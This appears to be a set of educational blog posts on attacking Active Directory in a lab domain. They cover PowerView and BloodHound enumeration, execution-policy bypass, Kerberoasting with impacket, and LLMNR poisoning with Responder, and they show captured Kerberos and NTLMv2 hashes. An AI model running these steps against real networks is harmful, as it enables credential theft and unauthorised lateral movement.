Domain Enumeration

Here we are going to cover some enumeration & credentials dumping techniques. Powerview It’s a powerfull powershell script that can be used for enumerating a domain after you have already gained a shell in the system(Post Exploitation). installation You can download it from here. Send it to the victim. usage powershell -ep bypass : to bypass execution policy and run powershell scripts in more free way (It’s just exists to prevent us from executing scripts by accident so we can shut it off using the previous command) . .\PowerView.ps1 : to start powerview Now we are able to do some enumeration PS C:\Users\Administrator\Desktop> Get-NetDomain Forest : rift.local DomainControllers : {NINJA-DC.rift.local} Children : {} DomainMode : Unknown DomainModeLevel : 7 Parent : PdcRoleOwner : NINJA-DC.rift.local RidRoleOwner : NINJA-DC.rift.local InfrastructureRoleOwner : NINJA-DC.rift.local Name : rift.local Users Enumeration PS C:\Users\Administrator\Desktop> Get-NetUser | select cn cn -- Administrator Guest DefaultAccount Eng krbtgt kayn jax zed SQL Service abdo kandil ahmed sphinky 7aidor Group Enumeration PS C:\Users\Administrator\Desktop> Get-NetGroup -name *admin* | select cn cn -- Administrators Hyper-V Administrators Storage Replica Administrators Schema Admins Enterprise Admins Domain Admins Key Admins Enterprise Key Admins DnsAdmins Shares Enumeration PS C:\Users\Administrator\Desktop> Invoke-ShareFinder Name Type Remark ComputerName ---- ---- ------ ------------ ADMIN$ 2147483648 Remote Admin NINJA-DC.rift.local C$ 2147483648 Default share NINJA-DC.rift.local hackme 0 NINJA-DC.rift.local IPC$ 2147483651 Remote IPC NINJA-DC.rift.local NETLOGON 0 Logon server share NINJA-DC.rift.local SYSVOL 0 Logon server share NINJA-DC.rift.local OS enumeration of the computers in the domain PS C:\Users\Administrator\Desktop> Get-NetComputer | select operatingsystem operatingsystem --------------- Windows Server 2016 Datacenter Windows 10 Enterprise LTSC use Get-NetComputer -fulldata | select operatingsystem if the previous command didn’t work This is a brief intro about installing and using powerview (OFC you can use it in more enumerations) BloodHound It uses graph theory to represent the relationships between the components within Active Directory. It visualizes the gathered data so identifing the complex paths within the Active Directory. We actually have 3 main parts Neo4j, SharpHound & BloodHound Neo4j: is a native graph database that implements a true graph model all the way down to the storage level. SharpHound: is the script that actually collects the data. BloodHound: is used for visualizing the collected data by SharpHound installation apt-get install bloodhound : to install bloodhound on your attacking machine. neo4j console : starting neo4j console and you will have neo4j:neo4j default credentials you will change the password and use the new creds in the next logins You can download SharpHound from here. Send it to the victim. usage On the target bypass exec policy like we did in powerview powershell -ep bypass . .\SharpHound.ps1 to start sharphound. Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip This will result in zip file called loot.zip contains the collected data. Sent that zip file to the attacking machine open bloodhound on the attacking machine using bloodhound drag the zip file to bloodhound and now you can use the ready queries or create a custom query to be visualized This’s example of visualizing of Find all Domain Admins query

Active Directory · 2024-07-16

Kerberos Delegation

Delegation means to delegate someone A to do specific task instead of someone B using the privilages of B Kerberos Unconstrained Delegation It’s allowing the first hop server (can be web server as example) to request access to any service on any computer in the domain. Before we go consider this situation .. You have an application server (has unconstrained delegation) and you as a user can access it There’s also server B which can’t be accessed by the user directly (The user has the privilages of accessing it but not through a direct interface), The app server can access the server B through an interface beteen them So if you want to access the server B you need to make use of the unconstrained delegation in the application server (Front end) to make it forward your request with your privilages to the Server B (Backend server). In This image we can see the operation In the steps 1,2 the user requests TGT for authentication as known before In the steps 3,4 the user requests TGS to access the app server (the point of unconstrained delegation) This TGS will contain also a forwardable TGT of the user The server can use the TGT embedded in the TGS to request the TGS of server B as example and it will get a valid TGS to access the server B because it’s based on the user’s privilages Attack The attack involves determining The components that has unconstrained delegation, then dumping the tickets it save so may lead us to impersonate the owner of the tickets

Active Directory · 2024-07-15

Kerberoast

Kerberoast This attack is a form of Lateral Movement in Active Directory Once You get any credentials in the domain, Do Kerberoasting !! but who is the target now ? It’s done againest any service account exploiting TGS creation mechanism, TGS : Ticket Granting Service This ticket is sent to the user who wants to access a specific service when this user provide the TGT The TGS is encrypted using the hash of the service, so you can try cracking it offline to get the password of the service Note : If there’s a port number in the SPN make sure that u remove it from the hash you get We use GetUserSPNs.py from impacket example usage ┌──(youssif㉿youssif)-[/usr/share/doc/python3-impacket/examples] └─$ python ./GetUserSPNs.py -dc-ip 192.168.2.129 rift.local/abdo:abdo123 -request Impacket v0.11.0 - Copyright 2023 Fortra Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ------------------------------------ ---------- -------- -------------------------- --------- ---------- NINJA-DC/SQLService.rift.local:60001 SQLService 2024-02-16 10:27:07.970505 <never> [-] CCache file is not found. Skipping... $krb5tgs$23$*SQLService$RIFT.LOCAL$rift.local/SQLService*$8953860704b1ee9e903ebfd13994127a$cb4559b82bac5bbb6fbdb6cbb0a59e7f0b63c4876b57b6bff24e39437b117aa8c5e1068b20fa2e98db8985d2bdf03ac4c47c53ca5abe4f620f10dd7def738f1b86c9af44fd28e5a23ca9104c7e1fa8dd79c06a626a7bba50ec14e68e553193be29b9e2059823f978cff43a029855c49885e101afdb5f006f987f9af300579f53b900acf1b2306e43ee8b726f463927c5863f39d3d58151d4d07ed745b43ba1106033eedef86a4eb2a0b228592a5038f3c523c608e95cebfed3f5eaa53411abe772c7fba6cae95e3e79a0d4250dc423aad2b6e2f45f2cf28733940b5d890e218ebee0c5d85ededa76e2a847bf101859a7c88e48721535fcb2f70e90c8810b433ebf8122d68b6794bf61a2a9346d96a0eaed7c82ea7ec8f8b488b9e9d5abc4b65d448de3e6791b53ec3d334ca005c640831b3e0aa6763e8cb96c206297f456c32ba51eaacc965a24e5ca4bddb92ea8d899470ea6b610f731bcc69b6df783a508b7396c3332ac085ec3cadbd8b34120fd2b81a192b0038f0d4d1356084b2a5976637fc6044a32e4b44f3278f1d006e47bde087aff1d52fc2cd5d9821a5849399130820860715dd7679d3d3575c015e127e93bed00012f92d041dca62abc18e56ecec99c1cfb01a08c6771bad888482089cf36333dd5b0b690a00fd248f131736e2eca4aa5f214e42fc540e43d55d3fd0350a39b03ee3606a4ab8a6985c00c2e43abe7e72250a9ddb21cd91861bc9b6ded2fe1410db0a744d89a61bdf3b19b1ce82e711696db3dcd0e7fe7fc8ef82d5b272152b6f8cbf06bb277e563cacbda406c8913f2848701cb7f5ef1999b358e31342fab00d71b4cf2c5828f50970390e041f7f74296bcf032ba7421f6a024b046f9fe44d7defd7f626eb4209ae05a62aaed3818f4dc17fc28136c3808c501361ed0f1ac7c4e677301d2c41639b26618ec9c8f07d3f88ed66eeaac94d53429232447ffbe33a8325649c07f7c44dffd8031c7bf4acb484915b5697c3fea356010e1f23555224e63ff1b315d8d11db5bd9f4be99da17b373bbaf6ab98945f0935e5d6f50feefbcc25227c43484cdb72c81e307cbece137307b8b0c51e3acdaec3c3f941de4cbebad5fd7aab2a139d0e43692b0cffafba2e7841d48ad0147014952f7df92f3003b2475f5bd08e52b1bbdea8545ed096dcb3369ca92777bd515283e7d2aaccc9d83aae1c9fd44f6608d381c7613052bdc8110bed85c97ba79bf9fb8ffe7f8525949a28299b78eb85eb0f2681ec9 Mitigation Mitigation is simple Use Strong Passwords (Hard to be cracked) Make sure the service accounts has the least privilages (Not an Admin as example)

Active Directory · 2024-06-21

SMB relay

Active Directory · 2024-02-17

LLMNR Poisoning

What is LLMNR The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link. The flaw occurs cuz of using user’s name and NLTMv2 hash in reponding. LLMNR Poisoning when trying to access smb share for example the computer makes the following steps: Check local cache for the record and if no record existing Send DNS query to the DNS server and the problem occurs here if the DNS server couldn’t find the file because The computer(victim) sends LLMNR query as broadcast The responder(Man in the middle) here will get the name and the NLTMv2 hash of the victim to respond As an attacker you can try cracking the NLTMv2 Hash using tool like hashcat LLMNR poisoning is an attack where a malicious actor listens for LLMNR requests and responds with their own IP address (or another IP of their choosing) to redirect the traffic. In our discussion we will use a tool called Responder to perform the role of the MITM which will get the name & hash and respond to the victim ┌──(youssif㉿youssif)-[~] └─$ sudo responder -I eth0 [sudo] password for youssif: sudo: a password is required ┌──(youssif㉿youssif)-[~] └─$ sudo responder -I eth0 [sudo] password for youssif: __ .----.-----.-----.-----.-----.-----.--| |.-----.----. | _| -__|__ --| _ | _ | | _ || -__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS, LLMNR & MDNS Responder 3.1.3.0 To support this project: Patreon -> https://www.patreon.com/PythonResponder Paypal -> https://paypal.me/PythonResponder Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C [+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF] [+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF] [+] Generic Options: Responder NIC [eth0] Responder IP [192.168.126.135] Responder IPv6 [fe80::9857:69cd:4087:1b54] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Current Session Variables: Responder Machine Name [WIN-NSDPQOYEW3Q] Responder Domain Name [HK3L.LOCAL] Responder DCE-RPC Port [49090] [+] Listening for events... Now the responder is set Let’s go to the victim and try accessing the responder IP from the victim machine as shown below When we look again at the responder we will find this [SMB] NTLMv2-SSP Client : 192.168.126.151 [SMB] NTLMv2-SSP Username : RIFT\jax [SMB] NTLMv2-SSP Hash : jax::RIFT:98bf26eff5a881f0:F2DD5C0A89CB1502E76F0C5B037915E4:0101000000000000800DF383E561DA01FB1EB125814EEC34000000000200080048004B0033004C0001001E00570049004E002D004E0053004400500051004F005900450057003300510004003400570049004E002D004E0053004400500051004F00590045005700330051002E0048004B0033004C002E004C004F00430041004C000300140048004B0033004C002E004C004F00430041004C000500140048004B0033004C002E004C004F00430041004C0007000800800DF383E561DA0106000400020000000800300030000000000000000100000000200000265F3E95F8F6700FA285D50194F0F4018C8BD4937F07A6298F296D9AE7D0EDD30A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100320036002E003100330035000000000000000000 As an attacker, u got the NTLMv2 Hash and you can try cracking it. You can also use the hash without cracking in other attacks.

Active Directory · 2024-02-17

0xk4k45h1

Contact

Active Directory